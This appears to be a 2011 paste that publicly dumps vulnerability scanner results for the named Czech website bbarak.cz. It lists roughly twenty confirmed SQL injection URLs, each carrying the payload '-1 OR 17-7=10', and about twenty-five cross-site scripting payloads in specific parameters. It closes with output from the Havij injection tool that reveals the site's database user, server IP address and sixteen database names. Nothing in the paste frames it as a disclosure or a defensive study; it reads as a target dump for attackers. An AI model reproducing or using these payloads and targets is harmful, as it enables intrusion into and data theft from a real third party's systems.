sroub3k

bbarak.cz

Dec 28th, 2011
  1. Boolean Based SQL Injection - BB.A.R.A.K.CZ
  2.  
  3. Severity : Critical
  4. Confirmation : Confirmed
  5. Detection Accuracy :
  6. Vulnerable URL : http://www.bbarak.cz/articles.php?cid=-1 OR 17-7=10
  7. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  8. Parameter Name: cid
  9. Parameter Type: Querystring
  10. Attack Pattern: -1 OR 17-7=10
  11.  
  12. Severity : Critical
  13. Confirmation : Confirmed
  14. Detection Accuracy :
  15. Vulnerable URL : http://www.bbarak.cz/news.php?id=-1 OR 17-7=10
  16. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  17. Parameter Name: id
  18. Parameter Type: Querystring
  19. Attack Pattern: -1 OR 17-7=10
  20.  
  21. Severity : Critical
  22. Confirmation : Confirmed
  23. Detection Accuracy :
  24. Vulnerable URL : http://www.bbarak.cz/reviews.php?cid=1&id=-1 OR 17-7=10
  25. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  26. Parameter Name: id
  27. Parameter Type: Querystring
  28. Attack Pattern: -1 OR 17-7=10
  29.  
  30. Severity : Critical
  31. Confirmation : Confirmed
  32. Detection Accuracy :
  33. Vulnerable URL : http://www.bbarak.cz/articles.php?cid=-1 OR 17-7=10&id=10115
  34. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  35. Parameter Name: cid
  36. Parameter Type: Querystring
  37. Attack Pattern: -1 OR 17-7=10
  38.  
  39. Severity : Critical
  40. Confirmation : Confirmed
  41. Detection Accuracy :
  42. Vulnerable URL : http://www.bbarak.cz/concerts.php?id=-1 OR 17-7=10
  43. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  44. Parameter Name: id
  45. Parameter Type: Querystring
  46. Attack Pattern: -1 OR 17-7=10
  47.  
  48. Severity : Critical
  49. Confirmation : Confirmed
  50. Detection Accuracy :
  51. Vulnerable URL : http://www.bbarak.cz/readers_echos.php?tid=102&cid=-1 OR 17-7=10&rid=10210&rreq=viewAll
  52. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  53. Parameter Name: cid
  54. Parameter Type: Querystring
  55. Attack Pattern: -1 OR 17-7=10
  56.  
  57. Severity : Critical
  58. Confirmation : Confirmed
  59. Detection Accuracy :
  60. Vulnerable URL : http://www.bbarak.cz/articles.php?cid=35&id=-1 OR 17-7=10
  61. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  62. Parameter Name: id
  63. Parameter Type: Querystring
  64. Attack Pattern: -1 OR 17-7=10
  65.  
  66. Severity : Critical
  67. Confirmation : Confirmed
  68. Detection Accuracy :
  69. Vulnerable URL : http://www.bbarak.cz/magazine.php?id=-1 OR 17-7=10
  70. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  71. Parameter Name: id
  72. Parameter Type: Querystring
  73. Attack Pattern: -1 OR 17-7=10
  74.  
  75. Severity : Critical
  76. Confirmation : Confirmed
  77. Detection Accuracy :
  78. Vulnerable URL : http://www.bbarak.cz/reviews.php?cid=-1 OR 17-7=10&from=0
  79. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  80. Parameter Name: cid
  81. Parameter Type: Querystring
  82. Attack Pattern: -1 OR 17-7=10
  83.  
  84. Severity : Critical
  85. Confirmation : Confirmed
  86. Detection Accuracy :
  87. Vulnerable URL : http://www.bbarak.cz/photoreports.php?id=-1 OR 17-7=10
  88. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  89. Parameter Name: id
  90. Parameter Type: Querystring
  91. Attack Pattern: -1 OR 17-7=10
  92.  
  93. Severity : Critical
  94. Confirmation : Confirmed
  95. Detection Accuracy :
  96. Vulnerable URL : http://www.bbarak.cz/interviews.php?id=-1 OR 17-7=10
  97. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  98. Parameter Name: id
  99. Parameter Type: Querystring
  100. Attack Pattern: -1 OR 17-7=10
  101.  
  102. Severity : Critical
  103. Confirmation : Confirmed
  104. Detection Accuracy :
  105. Vulnerable URL : http://www.bbarak.cz/liveshows.php?id=-1 OR 17-7=10
  106. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  107. Parameter Name: id
  108. Parameter Type: Querystring
  109. Attack Pattern: -1 OR 17-7=10
  110.  
  111. Severity : Critical
  112. Confirmation : Confirmed
  113. Detection Accuracy :
  114. Vulnerable URL : http://www.bbarak.cz/bazaar.php?cid=-1 OR 17-7=10
  115. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  116. Parameter Name: cid
  117. Parameter Type: Querystring
  118. Attack Pattern: -1 OR 17-7=10
  119.  
  120. Severity : Critical
  121. Confirmation : Confirmed
  122. Detection Accuracy :
  123. Vulnerable URL : http://www.bbarak.cz/links.php?id=-1 OR 17-7=10
  124. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  125. Parameter Name: id
  126. Parameter Type: Querystring
  127. Attack Pattern: -1 OR 17-7=10
  128.  
  129. Severity : Critical
  130. Confirmation : Confirmed
  131. Detection Accuracy :
  132. Vulnerable URL : http://www.bbarak.cz/press_news.php?id=-1 OR 17-7=10
  133. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  134. Parameter Name: id
  135. Parameter Type: Querystring
  136. Attack Pattern: -1 OR 17-7=10
  137.  
  138. Severity : Critical
  139. Confirmation : Confirmed
  140. Detection Accuracy :
  141. Vulnerable URL : http://www.bbarak.cz/inc/save_as_txt.php?tid=101&id=-1 OR 17-7=10
  142. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  143. Parameter Name: id
  144. Parameter Type: Querystring
  145. Attack Pattern: -1 OR 17-7=10
  146.  
  147. Severity : Critical
  148. Confirmation : Confirmed
  149. Detection Accuracy :
  150. Vulnerable URL : http://www.bbarak.cz/print.php?tid=101&cid=0&rid=-1 OR 17-7=10
  151. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  152. Parameter Name: rid
  153. Parameter Type: Querystring
  154. Attack Pattern: -1 OR 17-7=10
  155.  
  156. Severity : Critical
  157. Confirmation : Confirmed
  158. Detection Accuracy :
  159. Vulnerable URL : http://www.bbarak.cz/inc/send_as_email.php
  160. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  161. Parameter Name: id
  162. Parameter Type: Post
  163. Attack Pattern: -1 OR 17-7=10
  164.  
  165. Severity : Critical
  166. Confirmation : Confirmed
  167. Detection Accuracy :
  168. Vulnerable URL : http://www.bbarak.cz/author.php?id=-1 OR 17-7=10
  169. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  170. Parameter Name: id
  171. Parameter Type: Querystring
  172. Attack Pattern: -1 OR 17-7=10
  173.  
  174. Severity : Critical
  175. Confirmation : Confirmed
  176. Detection Accuracy :
  177. Vulnerable URL : http://www.bbarak.cz/readers_echos.php
  178. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  179. Parameter Name: cid
  180. Parameter Type: Post
  181. Attack Pattern: -1 OR 17-7=10
  182.  
  183. Severity : Critical
  184. Confirmation : Confirmed
  185. Detection Accuracy :
  186. Vulnerable URL : http://www.bbarak.cz/picture_photo.php?iid=-1 OR 17-7=10&pid=1469
  187. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  188. Parameter Name: iid
  189. Parameter Type: Querystring
  190. Attack Pattern: -1 OR 17-7=10
  191.  
  192.  
  193. ||| XSS
  194.  
  195. Severity : Important
  196. Confirmation : Confirmed
  197. Detection Accuracy :
  198. Vulnerable URL : http://www.bbarak.cz/articles.php?cid=" stYle="x:expre/**/ssion(alert(9)) &id=10115
  199. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  200. Parameter Name: cid
  201. Parameter Type: Querystring
  202. Attack Pattern: " stYle="x:expre/**/ssion(alert(9))
  203.  
  204. Severity : Important
  205. Confirmation : Confirmed
  206. Detection Accuracy :
  207. Vulnerable URL : http://www.bbarak.cz/articles.php?cid='"--></style></script><script>alert(0x000007)</script>
  208. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  209. Parameter Name: cid
  210. Parameter Type: Querystring
  211. Attack Pattern: '"--></style></script><script>alert(0x000007)</script>
  212.  
  213. Severity : Important
  214. Confirmation : Confirmed
  215. Detection Accuracy :
  216. Vulnerable URL : http://www.bbarak.cz/articles.php?cid="><ext/style=ext:expr/**/ession(alert(9))>
  217. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  218. Parameter Name: cid
  219. Parameter Type: Querystring
  220. Attack Pattern: "><ext/style=ext:expr/**/ession(alert(9))>
  221.  
  222. Severity : Important
  223. Confirmation : Confirmed
  224. Detection Accuracy :
  225. Vulnerable URL : http://www.bbarak.cz/readers_echos.php?tid='"--></style></script><script>alert(0x0001BE)</script>&cid=13&rid=10210&rreq=viewAll
  226. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  227. Parameter Name: tid
  228. Parameter Type: Querystring
  229. Attack Pattern: '"--></style></script><script>alert(0x0001BE)</script>
  230.  
  231. Severity : Important
  232. Confirmation : Confirmed
  233. Detection Accuracy :
  234. Vulnerable URL : http://www.bbarak.cz/readers_echos.php?tid="></style><script>alert(9)</script>&cid=13&rid=10210&rreq=viewAll
  235. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  236. Parameter Name: tid
  237. Parameter Type: Querystring
  238. Attack Pattern: "></style><script>alert(9)</script>
  239.  
  240. Severity : Important
  241. Confirmation : Confirmed
  242. Detection Accuracy :
  243. Vulnerable URL : http://www.bbarak.cz/interviews.php?cid="><script>alert(9)</script>&from=10
  244. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  245. Parameter Name: cid
  246. Parameter Type: Querystring
  247. Attack Pattern: "><script>alert(9)</script>
  248.  
  249. Severity : Important
  250. Confirmation : Confirmed
  251. Detection Accuracy :
  252. Vulnerable URL : http://www.bbarak.cz/liveshows.php?from='"--></style></script><script>alert(0x0006A2)</script>
  253. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  254. Parameter Name: from
  255. Parameter Type: Querystring
  256. Attack Pattern: '"--></style></script><script>alert(0x0006A2)</script>
  257.  
  258. Severity : Important
  259. Confirmation : Confirmed
  260. Detection Accuracy :
  261. Vulnerable URL : http://www.bbarak.cz/admin/images/magazines/pic_small_91.php/"ns="alert(0x00058A)
  262. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  263. Parameter Name: URI-BASED
  264. Parameter Type: RawUrlInjection
  265. Attack Pattern: /"ns="alert(0x00058A)
  266.  
  267. Severity : Important
  268. Confirmation : Confirmed
  269. Detection Accuracy :
  270. Vulnerable URL : http://www.bbarak.cz/search.php
  271. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  272. Parameter Name: string
  273. Parameter Type: Post
  274. Attack Pattern: '"--></style></script><script>alert(0x000582)</script>
  275.  
  276. Severity : Important
  277. Confirmation : Confirmed
  278. Detection Accuracy :
  279. Vulnerable URL : http://www.bbarak.cz/search.php
  280. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  281. Parameter Name: string
  282. Parameter Type: Post
  283. Attack Pattern: </a style=x:expre/**/ssion(alert(9))>
  284.  
  285. Severity : Important
  286. Confirmation : Confirmed
  287. Detection Accuracy :
  288. Vulnerable URL : http://www.bbarak.cz/photoreports.php?from='"--></style></script><script>alert(0x000624)</script>
  289. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  290. Parameter Name: from
  291. Parameter Type: Querystring
  292. Attack Pattern: '"--></style></script><script>alert(0x000624)</script>
  293.  
  294. Severity : Important
  295. Confirmation : Confirmed
  296. Detection Accuracy :
  297. Vulnerable URL : http://www.bbarak.cz/photoreports.php?from=0'"--></style></script><script>alert(0x00077C)</script>
  298. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  299. Parameter Name: from
  300. Parameter Type: Querystring
  301. Attack Pattern: 0'"--></style></script><script>alert(0x00077C)</script>
  302.  
  303. Severity : Important
  304. Confirmation : Confirmed
  305. Detection Accuracy :
  306. Vulnerable URL : http://www.bbarak.cz/news.php?from='"--></style></script><script>alert(0x000653)</script>
  307. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  308. Parameter Name: from
  309. Parameter Type: Querystring
  310. Attack Pattern: '"--></style></script><script>alert(0x000653)</script>
  311.  
  312. Severity : Important
  313. Confirmation : Confirmed
  314. Detection Accuracy :
  315. Vulnerable URL : http://www.bbarak.cz/news.php?from=0'"--></style></script><script>alert(0x00077B)</script>
  316. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  317. Parameter Name: from
  318. Parameter Type: Querystring
  319. Attack Pattern: 0'"--></style></script><script>alert(0x00077B)</script>
  320.  
  321. Severity : Important
  322. Confirmation : Confirmed
  323. Detection Accuracy :
  324. Vulnerable URL : http://www.bbarak.cz/interviews.php?from='"--></style></script><script>alert(0x000673)</script>
  325. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  326. Parameter Name: from
  327. Parameter Type: Querystring
  328. Attack Pattern: '"--></style></script><script>alert(0x000673)</script>
  329.  
  330. Severity : Important
  331. Confirmation : Confirmed
  332. Detection Accuracy :
  333. Vulnerable URL : http://www.bbarak.cz/interviews.php?from=0'"--></style></script><script>alert(0x00077A)</script>
  334. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  335. Parameter Name: from
  336. Parameter Type: Querystring
  337. Attack Pattern: 0'"--></style></script><script>alert(0x00077A)</script>
  338.  
  339. Severity : Important
  340. Confirmation : Confirmed
  341. Detection Accuracy :
  342. Vulnerable URL : http://www.bbarak.cz/interviews.php?cid=3&from='"--></style></script><script>alert(0x0006A3)</script>
  343. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  344. Parameter Name: from
  345. Parameter Type: Querystring
  346. Attack Pattern: '"--></style></script><script>alert(0x0006A3)</script>
  347.  
  348. Severity : Important
  349. Confirmation : Confirmed
  350. Detection Accuracy :
  351. Vulnerable URL : http://www.bbarak.cz/interviews.php?cid=3&from="></script><script>alert(9)</script>
  352. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  353. Parameter Name: from
  354. Parameter Type: Querystring
  355. Attack Pattern: "></script><script>alert(9)</script>
  356.  
  357. Severity : Important
  358. Confirmation : Confirmed
  359. Detection Accuracy :
  360. Vulnerable URL : http://www.bbarak.cz/liveshows.php?cid='"--></style></script><script>alert(0x0006BE)</script>&from=10
  361. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  362. Parameter Name: cid
  363. Parameter Type: Querystring
  364. Attack Pattern: '"--></style></script><script>alert(0x0006BE)</script>
  365.  
  366. Severity : Important
  367. Confirmation : Confirmed
  368. Detection Accuracy :
  369. Vulnerable URL : http://www.bbarak.cz/liveshows.php?cid='"--></style></script><script>alert(0x00077E)</script>&from=10
  370. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  371. Parameter Name: cid
  372. Parameter Type: Querystring
  373. Attack Pattern: '"--></style></script><script>alert(0x00077E)</script>
  374.  
  375. Severity : Important
  376. Confirmation : Confirmed
  377. Detection Accuracy :
  378. Vulnerable URL : http://www.bbarak.cz/admin/images/magazines/pic_banner_91.php/"ns="alert(0x0006FE)
  379. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  380. Parameter Name: URI-BASED
  381. Parameter Type: RawUrlInjection
  382. Attack Pattern: /"ns="alert(0x0006FE)
  383.  
  384. Severity : Important
  385. Confirmation : Confirmed
  386. Detection Accuracy :
  387. Vulnerable URL : http://www.bbarak.cz/press_news.php?from="><body onload=alert(9)>
  388. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  389. Parameter Name: from
  390. Parameter Type: Querystring
  391. Attack Pattern: "><body onload=alert(9)>
  392.  
  393. Severity : Important
  394. Confirmation : Confirmed
  395. Detection Accuracy :
  396. Vulnerable URL : http://www.bbarak.cz/readers_echos.php?tid='"--></style></script><script>alert(0x000816)</script>&cid=0&rid=3940&req=addForm
  397. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  398. Parameter Name: tid
  399. Parameter Type: Querystring
  400. Attack Pattern: '"--></style></script><script>alert(0x000816)</script>
  401.  
  402.  
  403. ||| Havij |||
  404.  
  405. Target: http://www.bbarak.cz/articles.php?cid=-1 OR 17-7=10
  406. Keyword Found: autor
  407. Injection type is Integer
  408.  
  409. Web Server: Apache
  410. DB Server: MySQL
  411.  
  412. ||| Info |||
  413.  
  414. Current User: bbarak.cz@93.185.104.22
  415. Current DB: bbarak_cz
  416. System User: bbarak.cz@93.185.104.22
  417. Host Name: www4
  418. Installation dir: /usr/local/
  419. Db user: 'bbarak.cz'@'%'
  420.  
  421. Data Base Found: information_schema
  422. Data Base Found: ads_bbarak_cz
  423. Data Base Found: bbarak_cz
  424. Data Base Found: bugs_bbarak_cz
  425. Data Base Found: charta_bbarak_cz
  426. Data Base Found: chat_bbarak_cz
  427. Data Base Found: click_bbarak_cz
  428. Data Base Found: colas_bbarak_cz
  429. Data Base Found: counter_bbarak_cz
  430. Data Base Found: etickets_bbarak_cz
  431. Data Base Found: ilbau_bbarak_cz
  432. Data Base Found: records_bbarak_cz
  433. Data Base Found: shop_bbarak_cz
  434. Data Base Found: tasks_bbarak_cz
  435. Data Base Found: tiskovky_bbarak_cz
  436. Data Base Found: urbanrapublic_bbarak_cz
  437.  
  438. |||